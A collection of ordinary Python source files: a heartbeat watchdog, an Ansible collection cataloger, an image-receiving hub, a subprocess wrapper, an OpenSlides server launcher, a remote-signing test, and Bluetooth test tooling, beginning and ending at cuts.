for scripts that making blocking calls and thus can't
heartbeat from their main loop.
"""
def _heartbeat():
while True:
heart.sleep()
heart.beat()
heartbeat = threading.Thread(target=_heartbeat)
# This causes the heartbeat thread to die with the main thread
heartbeat.daemon = True
heartbeat.start()
def start_watchdog_thread(heart):
"""
Watch a heartbeat file and restart when the file mtime is either
too old or too far in the future.
"""
def _watchdog():
while True:
time.sleep(heart.interval.total_seconds() * 0.10)
try:
stat = os.stat(heart.filepath)
mtime = datetime.datetime.fromtimestamp(stat.st_mtime)
except OSError as e:
if e.errno == 2: # No such file or directory
logbook.warning("Heartbeat file disappeared, restarting via SIGHUP.")
os.kill(heart.pid, signal.SIGHUP)
return
else:
raise
now = datetime.datetime.now()
if mtime >= now:
logbook.warning("Heartbeat file mtime is in the future, restarting via SIGHUP.")
os.kill(heart.pid, signal.SIGHUP)
return
watchdog = threading.Thread(target=_watchdog)
# This causes the watchdog thread to die with the main thread
watchdog.daemon = True
watchdog.start()
class Heart(object):
"""
Updates the access and modification timestamp of a
file every `interval` seconds.
"""
def __init__(self):
self.last_beat = datetime.datetime.now()
config = tweetsclient.Config().get()
try:
self.interval = datetime.timedelta(seconds=float(config.get('tweets-client', 'heartbeat_interval')))
except:
logbook.warning("No heartbeat_interval configuration parameter, skipping heartbeat.")
raise StopIteration
try:
directory = config.get('tweets-client', 'heartbeats_directory')
except:
logbook.warning("No heartbeats_directory configuration parameter, skipping heartbeat.")
raise StopIteration
if not os.path.isdir(directory):
logbook.warning("The heartbeats_directory parameter ({0}) is not a directory.",
directory)
raise StopIteration
scriptname = os.path.basename(sys.argv[0])
self.filepath = os.path.join(directory, scriptname)
start_time = datetime.datetime.now().isoformat()
self.pid = os.getpid()
with open(self.filepath, 'w') as fil:
fil.write(anyjson.serialize({
'pid': self.pid,
'started': start_time
}))
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
if ((exc_type, exc_value, traceback) == (None, None, None)) or (exc_type is KeyboardInterrupt):
os.unlink(self.filepath)
else:
with open(self.filepath, 'w') as outf:
print_exception(exc_type, exc_value, traceback, 1000, outf)
def sleep(self):
while True:
now = datetime.datetime.now()
since = now - self.last_beat
if since >= self.interval:
return
else:
time.sleep(self.interval.total_seconds() * 0.10)
def beat(self):
now = datetime.datetime.now()
since = now - self.last_beat
if since >= self.interval:
os.utime(self.filepath, None)
self.last_beat = now
return True
else:
return False
|
catalog_collections.py | """catalog collections
"""
import argparse
import hashlib
import json
import multiprocessing
import os
import re
import subprocess
import sys
from collections import Counter
from collections import OrderedDict
from datetime import datetime
from glob import glob
from json.decoder import JSONDecodeError
from typing import Dict
from typing import List
from typing import Tuple
import yaml
from ansible.utils.plugin_docs import get_docstring # type: ignore
from yaml.error import YAMLError
try:
from yaml import CSafeLoader as SafeLoader
except ImportError:
from yaml import SafeLoader # type: ignore
# pylint: disable=import-error
from key_value_store import KeyValueStore # type: ignore
# pylint: enable=import-error
PROCESSES = (multiprocessing.cpu_count() - 1) or 1
class CollectionCatalog:
# pylint: disable=too-few-public-methods
"""collection cataloger"""
def __init__(self, directories: List[str]):
"""Initialize the collection cataloger.
:param directories: A list of directories that may contain collections
"""
self._directories = directories
self._collections: OrderedDict[str, Dict] = OrderedDict()
self._errors: List[Dict[str, str]] = []
self._messages: List[str] = []
def _catalog_plugins(self, collection: Dict) -> None:
# pylint: disable=too-many-locals
"""catalog the plugins within a collection"""
path = collection["path"]
file_chksums = {}
file_manifest_file = collection.get("file_manifest_file", {}).get("name")
if file_manifest_file:
fpath = f"{path}/{file_manifest_file}"
if os.path.exists(fpath):
with open(file=fpath, encoding="utf-8") as read_file:
try:
loaded = json.load(read_file)
file_chksums = {v["name"]: v for v in loaded["files"]}
except (JSONDecodeError, KeyError) as exc:
self._errors.append({"path": fpath, "error": str(exc)})
exempt = ["action", "module_utils", "doc_fragments"]
plugin_directory = os.path.join(path, "plugins")
if os.path.isdir(plugin_directory):
plugin_dirs = [
(f.name, f.path)
for f in os.scandir(plugin_directory)
if f.is_dir() and f.name not in exempt
]
for plugin_type, path in plugin_dirs:
if plugin_type == "modules":
plugin_type = "module"
for (dirpath, _dirnames, filenames) in os.walk(path):
self._process_plugin_dir(
plugin_type,
filenames,
file_chksums,
dirpath,
collection,
)
@staticmethod
def _generate_chksum(file_path: str, relative_path: str) -> Dict:
"""generate a std checksum for a file"""
sha256_hash = hashlib.sha256()
with open(file_path, "rb") as fhand:
for byte_block in iter(lambda: fhand.read(4096), b""):
sha256_hash.update(byte_block)
res = {
"name": relative_path,
"ftype": "file",
"chksum_type": "sha256",
"chksum_sha256": sha256_hash.hexdigest(),
"format": 1,
}
return res
def _process_plugin_dir(
self,
plugin_type: str,
filenames: List,
file_chksums: Dict,
dirpath: str,
collection: Dict,
) -> None:
# pylint: disable=too-many-arguments
"""process each plugin within one plugin directory"""
for filename in filenames:
file_path = f"{dirpath}/{filename}"
relative_path = file_path.replace(collection["path"], "")
_basename, extension = os.path.splitext(filename)
if not filename.startswith("__") and extension == ".py":
chksum_dict = file_chksums.get(relative_path)
if not chksum_dict:
chksum_dict = self._generate_chksum(file_path, relative_path)
chksum = chksum_dict[f"chksum_{chksum_dict['chksum_type']}"]
collection["plugin_chksums"][chksum] = {"path": relative_path, "type": plugin_type}
def _one_path(self, directory: str) -> None:
"""process the contents of an <...>/ansible_collections/ directory"""
for directory_path in glob(f"{directory}/*/*/"):
manifest_file = f"{directory_path}/MANIFEST.json"
galaxy_file = f"{directory_path}/galaxy.yml"
collection = None
if os.path.exists(manifest_file):
with open(file=manifest_file, encoding="utf-8") as read_file:
try:
collection = json.load(read_file)
collection["meta_source"] = "MANIFEST.json"
except JSONDecodeError:
error = {
"path": os.path.dirname(manifest_file),
"error": "failed to load MANIFEST.json",
}
self._errors.append(error)
elif os.path.exists(galaxy_file):
with open(file=galaxy_file, encoding="utf-8") as read_file:
try:
collection = {"collection_info": yaml.load(read_file, Loader=SafeLoader)}
collection["meta_source"] = "galaxy.yml"
except YAMLError:
error = {
"path": os.path.dirname(galaxy_file),
"error": "failed to load galaxy.yml",
}
self._errors.append(error)
if collection:
cname = f"{collection['collection_info']['namespace']}"
cname += f".{collection['collection_info']['name']}"
collection["known_as"] = cname
collection["plugins"] = []
collection["plugin_chksums"] = {}
collection["path"] = directory_path
runtime_file = f"{directory_path}/meta/runtime.yml"
collection["runtime"] = {}
if os.path.exists(runtime_file):
with open(file=runtime_file, encoding="utf-8") as read_file:
try:
collection["runtime"] = yaml.load(read_file, Loader=SafeLoader)
except YAMLError as exc:
self._errors.append({"path": runtime_file, "error": str(exc)})
self._collections[collection["path"]] = collection
else:
msg = (
f"collection path '{directory_path}' is ignored as it does not"
" have 'MANIFEST.json' and/or 'galaxy.yml' file(s)."
)
self._messages.append(msg)
def _find_shadows(self) -> None:
"""for each collection, determine which other collections are hiding it"""
collection_list = list(self._collections.values())
counts = Counter([collection["known_as"] for collection in collection_list])
for idx, (cpath, o_collection) in reversed(list(enumerate(self._collections.items()))):
self._collections[cpath]["hidden_by"] = []
if counts[o_collection["known_as"]] > 1:
for i_collection in reversed(collection_list[0:idx]):
if i_collection["known_as"] == o_collection["known_as"]:
self._collections[cpath]["hidden_by"].insert(0, i_collection["path"])
def process_directories(self) -> Tuple[Dict, List]:
"""process each parent directory"""
for directory in self._directories:
collection_directory = f"{directory}/ansible_collections"
if os.path.exists(collection_directory):
self._one_path(collection_directory)
for _cpath, collection in self._collections.items():
self._catalog_plugins(collection)
self._find_shadows()
return self._collections, self._errors
def worker(pending_queue: multiprocessing.Queue, completed_queue: multiprocessing.Queue) -> None:
"""extract a doc from a plugin, place in completed q"""
# pylint: disable=import-outside-toplevel
# load the fragment_loader _after_ the path is set
from ansible.plugins.loader import fragment_loader # type: ignore
while True:
entry = pending_queue.get()
if entry is None:
break
collection_name, chksum, plugin_path = entry
try:
(doc, examples, returndocs, metadata) = get_docstring(
filename=plugin_path,
fragment_loader=fragment_loader,
collection_name=collection_name,
)
except Exception as exc: # pylint: disable=broad-except
err_message = f"{type(exc).__name__} (get_docstring): {str(exc)}"
completed_queue.put(("error", (chksum, plugin_path, err_message)))
continue
try:
q_message = {
"plugin": {
"doc": doc,
"examples": examples,
"returndocs": returndocs,
"metadata": metadata,
},
"timestamp": datetime.utcnow().isoformat(),
}
completed_queue.put(("plugin", (chksum, json.dumps(q_message, default=str))))
except JSONDecodeError as exc:
err_message = f"{type(exc).__name__} (json_decode_doc): {str(exc)}"
completed_queue.put(("error", (chksum, plugin_path, err_message)))
def identify_missing(collections: Dict, collection_cache: KeyValueStore) -> Tuple[set, List, int]:
"""identify plugins missing from the cache"""
handled = set()
missing = []
plugin_count = 0
for _cpath, collection in collections.items():
for chksum, details in collection["plugin_chksums"].items():
plugin_count += 1
if chksum not in handled:
if chksum not in collection_cache:
missing.append(
(collection["known_as"], chksum, f"{collection['path']}{details['path']}"),
)
handled.add(chksum)
return handled, missing, plugin_count
def parse_args():
"""parse the cli args"""
parser = argparse.ArgumentParser(description="Catalog collections.")
parser.add_argument(
"-d",
dest="dirs",
nargs="+",
help="search within the specified directories",
default=current_collection_paths,
)
parser.add_argument("-a", dest="adjacent", help="prepended to dirs")
parser.add_argument(
"-c",
dest="collection_cache_path",
help="path to collection cache",
required=True,
)
parsed_args = parser.parse_args()
adjacent = vars(parsed_args).get("adjacent")
if adjacent:
directories = [adjacent] + parsed_args.dirs
else:
directories = parsed_args.dirs
directories.extend(reversed(sys.path))
resolved = []
for directory in directories:
realpath = os.path.realpath(directory)
if realpath not in resolved:
resolved.append(realpath)
return parsed_args, resolved
def retrieve_collections_paths() -> Dict:
"""retrieve the currently set collection paths"""
cmd = ["ansible-config", "dump", "|", "grep", "COLLECTIONS_PATHS"]
proc_out = run_command(cmd)
if "error" in proc_out:
return proc_out
regex = re.compile(r"^(?P<variable>\S+)\((?P<source>.*)\)\s=\s(?P<current>.*)$")
parsed = regex.match(proc_out["stdout"])
if parsed:
try:
current = yaml.load(parsed.groupdict()["current"], Loader=SafeLoader)
return {"result": current}
except (YAMLError, KeyError) as exc:
return {"error": str(exc)}
return {"error": f"corrupt current collection path: {proc_out['stdout']}"}
def retrieve_docs(
collection_cache: KeyValueStore,
errors: List,
missing: List,
stats: Dict,
) -> None:
# pylint: disable=too-many-locals
"""extract the docs from the plugins"""
pending_queue = multiprocessing.Manager().Queue()
completed_queue = multiprocessing.Manager().Queue()
processes = []
for _proc in range(PROCESSES):
proc = multiprocessing.Process(target=worker, args=(pending_queue, completed_queue))
processes.append(proc)
proc.start()
for entry in missing:
pending_queue.put(entry)
for _proc in range(PROCESSES):
pending_queue.put(None)
for proc in processes:
proc.join()
while not completed_queue.empty():
message_type, message = completed_queue.get()
if message_type == "plugin":
chksum, plugin = message
collection_cache[chksum] = plugin
stats["cache_added_success"] += 1
elif message_type == "error":
chksum, plugin_path, error = message
collection_cache[chksum] = json.dumps({"error": error})
errors.append({"path": plugin_path, "error": error})
stats["cache_added_errors"] += 1
def run_command(cmd: List) -> Dict:
"""run a command"""
try:
proc_out = subprocess.run(
" ".join(cmd),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
check=True,
universal_newlines=True,
shell=True,
)
return {"stdout": proc_out.stdout}
except subprocess.CalledProcessError as exc:
return {"error": str(exc)}
def main() -> Dict:
# pylint: disable=protected-access
"""main"""
stats = {}
stats["cache_added_success"] = 0
stats["cache_added_errors"] = 0
cc_obj = CollectionCatalog(directories=parent_directories)
collections, errors = cc_obj.process_directories()
stats["collection_count"] = len(collections)
collection_cache_path = os.path.abspath(os.path.expanduser(args.collection_cache_path))
collection_cache = KeyValueStore(collection_cache_path)
handled, missing, plugin_count = identify_missing(collections, collection_cache)
stats["plugin_count"] = plugin_count
stats["unique plugins"] = len(handled)
stats["processed"] = len(missing)
if missing:
retrieve_docs(collection_cache, errors, missing, stats)
cached_chksums = collection_cache.keys()
stats["cache_length"] = len(collection_cache.keys())
for _cpath, collection in collections.items():
for no_doc in set(collection["plugin_chksums"].keys()) - set(cached_chksums):
del collection["plugin_chksums"][no_doc]
collection_cache.close()
return {
"collections": collections,
"errors": errors,
"stats": stats,
"messages": cc_obj._messages,
}
if __name__ == "__main__":
start_time = datetime.now()
collection_paths = retrieve_collections_paths()
if "error" in collection_paths:
sys.exit(collection_paths["error"])
else:
current_collection_paths = collection_paths["result"]
args, parent_directories = parse_args()
COLLECTION_SCAN_PATHS = ":".join(parent_directories)
os.environ["ANSIBLE_COLLECTIONS_PATHS"] = COLLECTION_SCAN_PATHS
result = main()
result["stats"]["duration"] = (datetime.now() - start_time).total_seconds()
result["collection_scan_paths"] = COLLECTION_SCAN_PATHS
print(json.dumps(result, default=str))
|
hub.py | """hub.py -- ImagHub and Settings classes
Copyright (c) 2018 by Jeff Bass.
License: MIT, see LICENSE for more details.
"""
import os
import sys
import yaml
import pprint
import signal
import logging
import itertools
import threading
from time import sleep
from ast import literal_eval
from datetime import datetime
from collections import deque
import numpy as np
import cv2
import imutils
from imutils.video import VideoStream
sys.path.insert(0, '../../imagezmq/imagezmq') # for testing
import imagezmq
from tools.utils import interval_timer
from tools.hubhealth import HealthMonitor
class ImageHub:
""" Contains the attributes and methods of an imagehub
One ImageHub is instantiated during the startup of the imagehub.py
program. It takes the settings loaded from the YAML file and sets all
the operational parameters of the imagehub, including the hub address and
port to receive messages, directories to store images and logs, etc.
The ImageHub has methods to write events from inbound message queue
to the event log and to write inbound image files to image directories.
Parameters:
settings (Settings object): settings object created from YAML file
"""
def __init__(self, settings):
# Check that numpy and OpenCV are OK; will get traceback error if not
self.tiny_image = np.zeros((3,3), dtype="uint8") # tiny blank image
ret_code, jpg_buffer = cv2.imencode(
".jpg", self.tiny_image, [int(cv2.IMWRITE_JPEG_QUALITY), 95])
self.tiny_jpg = jpg_buffer # matching tiny blank jpeg
# image queue of (node_and_view, image, type) to write to image directory
self.image_q = deque(maxlen=settings.queuemax)
# start system health monitoring & get system type (RPi vs Mac etc)
self.health = HealthMonitor(settings)
self.patience = settings.patience * 60 # convert to seconds
self.userdir = settings.userdir
# open ZMQ hub using imagezmq
self.image_hub = imagezmq.ImageHub()
self.receive_next = self.image_hub.recv_jpg # assume receving jpg
self.send_reply = self.image_hub.send_reply
# check that data and log directories exist; create them if not
# see docs for data directory structure including logs and images
self.data_directory = self.build_dir(settings.data_directory)
log_directory = os.path.join(self.data_directory, 'logs')
self.log_directory = self.build_dir(log_directory)
self.logfile = os.path.join(self.log_directory, 'imagehub.log')
images_directory = os.path.join(self.data_directory, 'images')
self.images_directory = self.build_dir(images_directory)
self.log = None
self.max_images_write = settings.max_images_write
self.image_count = 0 # count of images written in current directory
self.first_time_over_max = True # is this the first time max exceeded?
self.image_writing_thread = threading.Thread(daemon=True,
target=self.image_writer)
self.keep_writing = True
self.image_writing_thread.start()
def build_dir(self, directory):
"""Build full directory name from settings directory from yaml file
"""
full_directory = os.path.join(self.userdir, directory)
try:
os.mkdir(full_directory)
self.image_count = 0 # Each new image directory gets a new 0 count
self.first_time_over = True # if exceeded, this is first time
except FileExistsError:
pass
return full_directory
def process(self, text, image, settings):
''' process one incoming node message
Every node message has a text part and an image part
There are 2 formats for the node message text part:
Event message: nodename viewname | event_type | optional added info
Image message: nodename viewname | image_type
(where image_type is either 'jpg' or 'image')
See docs/imagehub-details.rst for more about message formats
'''
message = text.split("|")
if len(message) < 2: # a "send_test_image" that should not be saved
return b'OK'
type = message[1] # type is the second delimited field in text
t0 = type[0] # the first character of type is unique & compares faster
if t0 == 'H': # Heartbeat message; return before testing anything else
return b'OK'
node_and_view = message[0].strip().replace(' ', '-')
# datetime.now().isoformat() looks like '2013-11-18T08:18:31.809000'
timestamp = datetime.now().isoformat().replace(':', '.')
image_filename = node_and_view + '-' + timestamp
if t0 == "i": # image
pass # ignore image type; only saving jpg images for now
elif t0 == 'j': # jpg; append to image_q
self.image_q.append((image_filename, image, t0,))
# writing image files from image_q is normally done in a thread
# but for unthreaded testing, uncomment below to write every image
# self.write_one_image()
else:
log_text = text # may strip spaces later?
self.log.info(log_text)
return b'OK'
def image_writer(self):
# writes all the images in the image_q
# run as a separate thread, started in the class constructor
while self.keep_writing:
if len(self.image_q) > 0:
self.write_one_image()
else:
sleep(0.0000001) # sleep before checking image_q again
def write_one_image(self):
# when actually writing images, need to stop if too many have been
# written, to prevent disk fillup; need to set limits in imagehub.yaml
filename, image, type = self.image_q.popleft()
date = filename[-26:-16]
date_directory = os.path.join(self.images_directory, date)
date_directory = self.build_dir(date_directory)
self.image_count += 1
if self.image_count > self.max_images_write:
if self.first_time_over_max:
self.log.warning('Max images written. Writing stopped.')
self.first_time_over_max = False
return # This directory has hit its maximum number of images
full_file_name = os.path.join(date_directory, filename) + ".jpg"
# write the image file to disk using full_file_name
with open(full_file_name,"wb") as f:
f.write(image)
def handle_timeout(self):
timestamp = datetime.now().isoformat().replace(':', '.')
message = 'No messages received for ' + str(
self.patience // 60) + ' minutes.'
self.log.info(message)
pass
def closeall(self):
""" Close all resources & write any images remaining in image_q.
"""
# write any any images left in queue to files
self.keep_writing = False # signals the image writing thread to stop
# wait for 1 second, then write any images left in the image_q
sleep(1)
while len(self.image_q) > 0:
self.write_one_image()
pass
class Settings:
"""Load settings from YAML file
Note that there is currently almost NO error checking for the YAML
settings file. Therefore, by design, an exception will be raised
when a required setting is missing or misspelled in the YAML file.
This stops the program with a Traceback which will indicate which
setting below caused the error. Reading the Traceback will indicate
which line below caused the error. Fix the YAML file and rerun the
program until the YAML settings file is read correctly.
There is a "print_settings" option that can be set to TRUE to print
the dictionary that results from reading the YAML file. Note that the
order of the items in the dictionary will not necessarily be the order
of the items in the YAML file (this is a property of Python dictionaries).
"""
def __init__(self):
userdir = os.path.expanduser("~")
self.userdir = userdir
with open(os.path.join(userdir,"imagehub.yaml")) as f:
self.config = yaml.safe_load(f)
self.print_hub = False
if 'hub' in self.config:
if 'print_settings' in self.config['hub']:
if self.config['hub']['print_settings']:
self.print_settings()
self.print_hub = True
else:
self.print_hub = False
else:
self.print_settings('"hub" is a required settings section but not present.')
raise KeyboardInterrupt
if 'patience' in self.config['hub']:
self.patience = self.config['hub']['patience']
else:
self.patience = 10 # default is to wait 10 minutes for imagenodes
if 'queuemax' in self.config['hub']:
self.queuemax = self.config['hub']['queuemax']
else:
self.queuemax = 500
if 'data_directory' in self.config['hub']:
self.data_directory = self.config['hub']['data_directory']
else:
self.data_directory = 'imagehub_data'
if 'max_images_write' in self.config['hub']:
self.max_images_write = self.config['hub']['max_images_write']
else:
self.max_images_write = 5000
def print_settings(self, title=None):
""" prints the settings in the yaml file using pprint()
"""
if title:
print(title)
print('Contents of imagehub.yaml:')
pprint.pprint(self.config)
print()
|
script.py | """
All Work with linux scripting
"""
__author__ = ('Reza Zeiny <rezazeiny1998@gmail.com>',)
import logging
import random
import string
import subprocess
from threading import Thread
logger = logging.getLogger(__name__)
PIPE = -1
STDOUT = -2
DEVNULL = -3
def id_generator(size: int = 6, chars: list = string.ascii_uppercase + string.ascii_lowercase + string.digits) -> str:
"""
Generate random string
Args:
size (int): size of random string
chars (list): define select set
Returns:
(str) : random string
"""
return ''.join(random.choice(chars) for _ in range(size))
class ShellScript:
"""
Shell Script
"""
def __init__(self, args, *, timeout=None, background=False, quiet=False, extra_data=None):
self.__used = False
self.command = args
self.is_running = False
self.process_id = None
self.exit_code = None
self.stdout = None
self.stderr = None
self.error = None
self.timeout = timeout
self.background = background
self.quiet = quiet
self.extra_data = extra_data
def _log(self, level, message, data=None):
if data is None:
data = {}
if logger.isEnabledFor(level):
# noinspection PyProtectedMember
logger._log(level, f"run {self.command}: {message}", (data,))
def _run_job(self):
self.is_running = True
self._log(logging.DEBUG, "Start")
if self.quiet:
stderr = DEVNULL
stdout = DEVNULL
else:
stdout = PIPE
stderr = PIPE
try:
process = subprocess.Popen(self.command, stdout=stdout, stderr=stderr)
self.process_id = process.pid
self._on_start()
try:
stdout, stderr = process.communicate(timeout=self.timeout)
except Exception as e:
process.kill()
raise e
if stdout is not None:
if type(stdout) == bytes:
self.stdout = stdout.decode().split("\n")[:-1]
else:
self.stdout = []
if stderr is not None:
if type(stderr) == bytes:
self.stderr = stderr.decode().split("\n")[:-1]
else:
self.stderr = []
self.exit_code = process.poll()
self.is_running = False
if self.exit_code == 0:
self._log(logging.DEBUG, "Completed")
self._on_success()
else:
self._log(logging.DEBUG, f"Error Code {self.exit_code}")
self._on_error()
except Exception as e:
self.is_running = False
self.error = e
self._log(logging.DEBUG, f"Exception {e}")
self._on_exception()
return self
def _on_start(self):
"""
If command is starting
"""
pass
def _on_error(self):
"""
If exit code of running command is not zero call this function
"""
pass
def _on_success(self):
"""
If exit code of running command is zero call this function
"""
pass
def _on_exception(self):
"""
If acquire any exception while running command call this function
"""
pass
def run(self):
"""
Run Script
"""
if self.__used:
raise Exception("this command was run before. make a new instance")
self.__used = True
if self.background:
job = Thread(target=self._run_job)
job.start()
while self.process_id is None and self.error is None:
pass
else:
self._run_job()
return self
|
main.py | import logging
import multiprocessing
import os
import signal
import sys
import time
from typing import Any
from datastore.reader.app import register_services
from gunicorn.app.base import BaseApplication
from migrations import assert_migration_index as assert_migration_index
from .shared.env import is_dev_mode
from .shared.interfaces.logging import LoggingModule
from .shared.interfaces.wsgi import WSGIApplication
register_services()
# ATTENTION: We use the Python builtin logging module. To change this use
# something like "import custom_logging as logging".
DEFAULT_ADDRESSES = {
"ActionView": "0.0.0.0:9002",
"PresenterView": "0.0.0.0:9003",
}
class OpenSlidesBackendGunicornApplication(BaseApplication): # pragma: no cover
"""
Standalone application class for Gunicorn. It prepares Gunicorn for using
OpenSlidesBackendWSGIApplication via OpenSlidesBackendWSGIContainer either
with action component or with presenter component.
"""
def __init__(self, view_name: str, *args: Any, **kwargs: Any) -> None:
# Setup global loglevel.
if is_dev_mode():
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
self.view_name = view_name
if self.view_name not in ("ActionView", "PresenterView"):
raise ValueError(
f"View name has to be ActionView or PresenterView, not {self.view_name}."
)
logger.debug(f"Create gunicorn application for {self.view_name}.")
assert_migration_index()
super().__init__(*args, **kwargs)
def load_config(self) -> None:
loglevel = "debug" if is_dev_mode() else "info"
options = {
"bind": DEFAULT_ADDRESSES[self.view_name],
"worker_tmp_dir": "/dev/shm", # See https://pythonspeed.com/articles/gunicorn-in-docker/
"timeout": int(os.environ.get("OPENSLIDES_BACKEND_WORKER_TIMEOUT", "30")),
"loglevel": loglevel,
"reload": loglevel == "debug",
"reload_engine": "auto", # This is the default however.
}
for key, value in options.items():
self.cfg.set(key, value)
def load(self) -> WSGIApplication:
# We import this here so Gunicorn can use its reload feature properly.
from .wsgi import create_wsgi_application
# TODO: Fix this typing problem.
logging_module: LoggingModule = logging # type: ignore
return create_wsgi_application(logging_module, self.view_name)
def start_action_server() -> None: # pragma: no cover
OpenSlidesBackendGunicornApplication(view_name="ActionView").run()
def start_presenter_server() -> None: # pragma: no cover
OpenSlidesBackendGunicornApplication(view_name="PresenterView").run()
def start_them_all() -> None: # pragma: no cover
print(
f"Start all components in child processes. Parent process id is {os.getpid()}."
)
processes = {
"action": multiprocessing.Process(target=start_action_server),
"presenter": multiprocessing.Process(target=start_presenter_server),
}
for process in processes.values():
process.start()
def sigterm_handler(signalnum: int, current_stack_frame: Any) -> None:
strsignal = signal.strsignal # type: ignore
print(
f"Parent process {os.getpid()} received {strsignal(signalnum)} "
"signal. Terminate all child processes first."
)
for child in multiprocessing.active_children():
child.terminate()
child.join()
print(f"Parent process {os.getpid()} terminated successfully.")
sys.exit(0)
signal.signal(signal.SIGTERM, sigterm_handler)
signal.signal(signal.SIGINT, sigterm_handler)
while True:
for name, process in processes.items():
if not process.is_alive():
process.join()
print(
f"Component {name} terminated. Terminate all other components now."
)
for other_name, other_process in processes.items():
if name != other_name:
other_process.terminate()
other_process.join()
print("Parent process terminated.")
sys.exit(1)
time.sleep(0.1)
def main() -> None: # pragma: no cover
component = os.environ.get("OPENSLIDES_BACKEND_COMPONENT", "all")
if component == "action":
start_action_server()
elif component == "presenter":
start_presenter_server()
elif component == "all":
start_them_all()
else:
print(
f"Error: OPENSLIDES_BACKEND_COMPONENT must not be {component}.",
file=sys.stderr,
)
sys.stderr.flush()
sys.exit(1)
sys.exit(0)
|
test_remote_signer.py |
from isign import isign
from isign_base_test import IsignBaseTest
from multiprocessing import Process
from signing_service import SigningService
from signing_service_config import SigningServiceConfig
import time
from TestPythonLibDir.RemotePkcs1Signer import RemotePkcs1Signer
CONFIG = SigningServiceConfig()
class TestRemoteSigner(IsignBaseTest):
@staticmethod
def start_httpd():
signing_service = SigningService()
def start_signing_service():
signing_service.start(quiet=True)
httpd_process = Process(name='signing_service', target=start_signing_service)
httpd_process.daemon = True
httpd_process.start()
time.sleep(1)
return httpd_process
def test_remote_signer(self):
output_path = self.get_temp_file()
httpd_process = None
try:
httpd_process = self.start_httpd()
isign.resign(
IsignBaseTest.TEST_IPA_XCODE7,
certificate=IsignBaseTest.CERTIFICATE,
provisioning_profiles=[IsignBaseTest.PROVISIONING_PROFILE],
output_path=output_path,
signer_class=RemotePkcs1Signer,
signer_arguments={
'host': CONFIG.host,
'port': CONFIG.port,
'key': CONFIG.cert_hash_to_key_file.keys()[0]
}
)
# test the output path for correctness
finally:
if httpd_process is not None:
httpd_process.terminate()
|
tooling.py | # TODO: add support for external tools: btmon, serial port output,
# file management with result sorting
import subprocess
import threading
import serial
import os
import time
import logging
import signal
from queue import Queue
from fcntl import fcntl, F_GETFL, F_SETFL
from os import O_NONBLOCK
from pathlib import Path
from coap_config import *
def get_tty_path(name):
"""Returns tty path (eg. /dev/ttyUSB0) of serial device with specified name
:param name: device name
:return: tty path if device found, otherwise None
"""
serial_devices = {}
ls = subprocess.Popen(["ls", "-l", "/dev/serial/by-id"],
stdout=subprocess.PIPE)
awk = subprocess.Popen("awk '{if (NF > 5) print $(NF-2), $NF}'",
stdin=ls.stdout,
stdout=subprocess.PIPE,
shell=True)
end_of_pipe = awk.stdout
for line in end_of_pipe:
device, serial = line.decode().rstrip().split(" ")
serial_devices[device] = serial
for device, serial in list(serial_devices.items()):
if name in device:
tty = os.path.basename(serial)
return "/dev/{}".format(tty)
return None
class BTMonitor():
def __init__(self, conn='J-Link', bsp='nrf52', serial_num=None, mode='write', testcase=None):
self.conn = conn
self.mode = mode
self.bsp = bsp
self.serial_num = serial_num
self.testcase = testcase
self.bsp = bsp
self.process = None
self.end_read = False
def read_func_output(self, process, q):
while not self.end_read:
output = process.stdout.readline().decode()
if len(output) > 0:
logging.debug(output)
q.put(output)
if 'RTT opened' in output:
logging.debug(output)
break
return
def begin(self):
# stdbuf -o0 removes PIPE buffering: all data on PIPE is ready to be read just when it appears
cmd = ['stdbuf', '-o0', 'btmon'] + \
['-J' if self.conn == 'J-Link' else self.conn] + \
[str(self.bsp) + ','+ str(self.serial_num) if self.serial_num else str(self.bsp)] + \
['-w' if self.mode == 'write' else ''] + \
[str(self.testcase) + '.snoop' if self.testcase is not None else 'btmonlog.snoop']
logging.debug(' '.join(cmd))
self.process = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE)
# Check if process is indeed running
if self.process.poll() is not None:
logging.error('Failed to run btmon')
while True:
q = Queue()
thread = threading.Thread(target=self.read_func_output, args=[self.process, q], )
thread.start()
thread.join(1)
if thread.is_alive():
logging.debug('End btmon output check')
self.end_read = True
while True:
output = q.get()
logging.debug('queue length: ' + str(q.qsize()))
logging.debug(output)
# empty btmon output signals failure on startup; return value can be used to detect it
if 'RTT opened' in output:
logging.debug('btmon connected')
return 0
# else:
elif 'Failed to open J-Link' in output:
logging.debug('J-Link failed')
return 1
if q.empty():
return 1
return 1
def close(self):
os.kill(self.process.pid, signal.SIGINT)
rc = self.process.wait()
logging.debug('btmon closed: ' + str(rc))
class RTT2PTY:
def __init__(self):
self.rtt2pty_process = None
self.pty_name = None
self.serial_thread = None
self.stop_thread = threading.Event()
self.log_filename = None
self.log_file = None
self.testcase = None
def _start_rtt2pty_proc(self):
self.rtt2pty_process = subprocess.Popen('rtt2pty',
shell=False,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
flags = fcntl(self.rtt2pty_process.stdout, F_GETFL) # get current p.stdout flags
fcntl(self.rtt2pty_process.stdout, F_SETFL, flags | O_NONBLOCK)
time.sleep(3)
pty = None
try:
for line in iter(self.rtt2pty_process.stdout.readline, b''):
line = line.decode('UTF-8')
if line.startswith('PTY name is '):
pty = line[len('PTY name is '):].strip()
except IOError:
pass
return pty
def _read_from_port(self, ser, stop_thread, file):
current_test = None
while not stop_thread.is_set():
if self.testcase != current_test:
file.write('--- tc: #' + str(self.testcase) + '---\n')
current_test = self.testcase
data = ser.read(ser.in_waiting)
try:
decoded = data.decode()
except UnicodeDecodeError:
continue
file.write(decoded)
file.flush()
return 0
def start(self, log_filename):
self.log_filename = log_filename
self.pty_name = self._start_rtt2pty_proc()
self.ser = serial.Serial(self.pty_name, 115200, timeout=0)
self.stop_thread.clear()
self.log_file = open(self.log_filename, 'a')
self.serial_thread = threading.Thread(
target=self._read_from_port, args=(self.ser, self.stop_thread, self.log_file), daemon=True)
self.serial_thread.start()
def stop(self):
self.stop_thread.set()
if self.serial_thread:
self.serial_thread.join()
self.serial_thread = None
if self.log_file:
self.log_file.close()
self.log_file = None
if self.rtt2pty_process:
self.rtt2pty_process.send_signal(signal.SIGINT)
self.rtt2pty_process.wait()
self.rtt2pty_process = None
def rtt2pty_start(self):
if serial_read_enable:
name = 'iut-mynewt.log'
self.start(os.path.join(Path.cwd(), name))
def rtt2pty_stop(self):
if serial_read_enable:
self.stop()
class NewtMgr:
